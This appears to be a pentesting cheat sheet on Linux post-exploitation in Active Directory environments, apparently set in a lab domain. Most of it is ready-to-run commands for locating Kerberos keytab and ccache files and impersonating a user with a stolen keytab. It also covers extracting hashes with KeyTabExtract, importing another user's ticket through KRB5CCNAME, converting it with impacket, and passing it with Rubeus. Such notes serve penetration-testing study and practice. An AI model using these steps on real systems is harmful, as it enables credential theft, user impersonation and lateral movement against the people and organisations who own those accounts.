Linux Post-Exploitation

The only difference from Post-Exploitation in #Pentesting is that here we would use only AD-related PE vectors which is executed in Linux OS.

Linux computers can connect to Active Directory, though it's a Microsoft technology. Also it's not required for Linux machine to be connected to AD to use Kerberos tickets.

Checking Linux and AD relations

realm

realm list

PS

ps -ef | grep -i "winbind\|sssd"

Finding Kerberos Tickets

Finding tickets is very important part of Active Directory exploitation and post-exploitation. For a beginning, tickets in Linux are usually located here:

• keytab files - commonly allow scripts to authenticate automatically using Kerberos without human interaction or access to a password stored in a plain text file

• ccache files - credential cache is stored in /tmp directory

• KRB5CCNAME - environment variable

Crontab

crontab -l

Keytab Files

find / -name *keytab* -ls 2>/dev/null

Ccache

env | grep -i krb5
ls -la /tmp

Abusing Keytab

Impersonate user

klist -k -t #list keytab file info
kinit carni7@AMOGUS.KEK -k -t /opt/kerbusers/carni7.keytab #impersonation carni7 using his keytab

KeyTabExtract

[LINK] This is tool which is extracting Kerberos hashes from keytab file.

python3 /opt/keytabextract.py /opt/specialfiles/carni7.keytab 

Abusing ccache

For using ccache files you need to have root privileges

Checking group privileges

id carni7@amogus.kek

Now after locating right non-expired Kerberos ticket, we could import ccache file into our session by changing value of KRB5CCNAME env and checking tickets with klist.

cp /tmp/krb5cc_768304578_BRB541 .
export KRB5CCNAME=/root/krb5cc_768304578_BRB541
klist
Ticket cache: FILE:/root/krb5cc_768304578_BRB541

If the result is the same, we could be sure that now Kerberos is using our ticket.

Ticket Converter

impacket-ticketConverter krb5cc_768304578_BRB541 carni7.kirbi

Importing Kerberos Ticket

C:\Rubeus.exe ptt /ticket:c:\carni7.kirbi